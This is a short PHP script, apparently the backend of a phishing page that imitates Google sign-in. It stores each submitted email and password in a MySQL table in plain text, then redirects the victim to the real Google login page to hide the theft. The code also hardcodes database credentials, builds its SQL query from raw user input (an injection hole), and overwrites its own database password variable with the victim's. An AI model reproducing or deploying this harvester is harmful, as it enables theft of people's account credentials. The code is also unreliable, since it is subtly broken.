<?php
// Conexión a la base de datos (modifica los valores según tu configuración)
$servername = "localhost";
$username = "id22009816_google";
$password = "Admin123!";
$database = "id22009816_login";

// Recibe los datos del formulario
$email = $_POST['email'];
$password = $_POST['password'];

// Inserta los datos en la base de datos
$conn = new mysqli($servername, $username, $password, $database);

// Verifica la conexión
if ($conn->connect_error) {
  die("Conexión fallida: " . $conn->connect_error);
}

// Prepara la consulta SQL
$sql = "INSERT INTO usuarios (email, password) VALUES ('$email', '$password')";

// Ejecuta la consulta
if ($conn->query($sql) === TRUE) {
  // Redirige al usuario a la URL de Google
  header("Location: https://accounts.google.com/v3/signin/identifier?continue=https%3A%2F%2Faccounts.google.com%2F&followup=https%3A%2F%2Faccounts.google.com%2F&ifkv=ARZ0qKLloOe3mmjxDZoJJfFyikuxgaFh5bdslOAoxkXm4y-n24HHuAbjf8ZL7VgOBeXh_RBhFScAKw&passive=1209600&flowName=GlifWebSignIn&flowEntry=ServiceLogin&dsh=S1258681205%3A1713436629307823&theme=mn&ddm=0");
  exit;
} else {
  echo "Error: " . $sql . "<br>" . $conn->error;
}

// Cierra la conexión
$conn->close();
?>